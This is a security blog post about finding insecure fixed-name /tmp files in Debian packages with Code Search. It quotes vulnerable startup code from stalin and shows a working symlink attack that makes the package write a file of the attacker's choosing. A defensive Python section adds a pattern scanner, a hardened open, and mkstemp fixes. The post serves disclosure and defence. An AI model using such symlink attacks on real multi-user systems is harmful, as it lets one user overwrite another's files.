This week I'll be mostly doing drive-by bug-reporting.
As with last year, we start by using Debian Code Search to look for obviously broken patterns such as "system.>./tmp/.*".
Once we find a fun match we examine the code and then report the bugs we find. Today that was stalin, which runs some fantastic things on startup:
(system "uname -m >/tmp/QobiScheme.tmp")
(system "rm -f /tmp/QobiScheme.tmp"))
We can exploit this like so:
$ ln -s /home/steve/HACK /tmp/QobiScheme.tmp
$ ls -l /home/steve/HACK
ls: cannot access /home/steve/HACK: No such file or directory
Now we run the script:
$ cd /tmp/stalin-0.11/benchmarks
$ ./make-hello
And we see this:
$ ls -l /home/steve/HACK
-rw-r--r-- 1 steve steve 6 Dec 22 08:30 /home/steve/HACK
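The two halves of the write-up are a search for the pattern and a demonstration of why it matters. The following is an added example, not code from the post or from stalin, that does both from the defender's side: a small scanner in the spirit of the Code Search query above (the regex is my loosened approximation of "system.>./tmp/.*", the sample source is constructed from the two stalin lines), a hardened open that refuses a pre-planted symlink, and two ways to get what the stalin snippet actually wants without a fixed-name file in /tmp. Function names are mine.

```python
import os
import re
import subprocess
import tempfile

# Loosened form of the post's Code Search query: a system()/shell call
# whose output is redirected into a fixed path under /tmp.
FIXED_TMP_PATTERN = re.compile(r'system.*>\s*/tmp/\S+')


def find_fixed_tmp_redirections(source: str):
    """Return (line_number, line) for every line that redirects shell output
    into a fixed /tmp path, the pattern the post greps for."""
    hits = []
    for n, line in enumerate(source.splitlines(), start=1):
        if FIXED_TMP_PATTERN.search(line):
            hits.append((n, line.strip()))
    return hits


# Constructed sample: the two stalin lines quoted in the post plus a harmless one.
SAMPLE_SOURCE = """\
(define (machine-type)
  (system "uname -m >/tmp/QobiScheme.tmp")
  (system "rm -f /tmp/QobiScheme.tmp"))
(display "no temp file here")
"""


def create_exclusive(path: str) -> int:
    """Open PATH for writing only if nothing is there yet.
    O_CREAT|O_EXCL makes the kernel refuse a pre-existing path, including a
    dangling symlink, so a planted link cannot redirect the write elsewhere."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    return os.open(path, flags, 0o600)


def symlink_attack_blocked() -> bool:
    """Replay the post's scenario inside a private directory: plant a symlink
    at the fixed name, then attempt the hardened open. True when the open is
    refused and the link target is never created."""
    with tempfile.TemporaryDirectory() as tmpdir:
        fixed = os.path.join(tmpdir, "QobiScheme.tmp")
        target = os.path.join(tmpdir, "HACK")
        os.symlink(target, fixed)  # same as `ln -s .../HACK /tmp/QobiScheme.tmp`
        try:
            fd = create_exclusive(fixed)
        except OSError:  # EEXIST (or ELOOP with O_NOFOLLOW)
            return not os.path.exists(target)
        os.close(fd)
        return False


def machine_type() -> str:
    """What the stalin snippet is really after: the output of `uname -m`.
    Capturing it directly needs no file in a shared directory at all."""
    return subprocess.run(["uname", "-m"], capture_output=True,
                          text=True, check=True).stdout.strip()


def machine_type_via_tempfile() -> str:
    """If a file is genuinely required, let mkstemp choose an unpredictable
    name (created with O_EXCL) and remove it ourselves afterwards."""
    fd, path = tempfile.mkstemp(prefix="QobiScheme.")
    try:
        subprocess.run(["uname", "-m"], stdout=fd, check=True)
        with open(path) as f:
            return f.read().strip()
    finally:
        os.close(fd)
        os.unlink(path)


if __name__ == "__main__":
    for n, line in find_fixed_tmp_redirections(SAMPLE_SOURCE):
        print(f"line {n}: {line}")
    print("planted symlink blocked:", symlink_attack_blocked())
    print("machine type:", machine_type(), machine_type_via_tempfile())
```

The scanner is only a triage aid, like the Code Search query itself: it flags the fixed-name-in-/tmp shape, and a human still has to read the surrounding code. The hardened open is the check that actually closes the hole, and `mkstemp` gets it for free, which is why the fix for the stalin bug is "stop naming the file yourself", not "try to detect the race".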
For future reference, lsat looks horrifically bad: it writes multiple times to /tmp/lsat1.lsat and although it tries to detect races I'm not convinced. Something to look at in the future.
Tags: codesearch, debian, security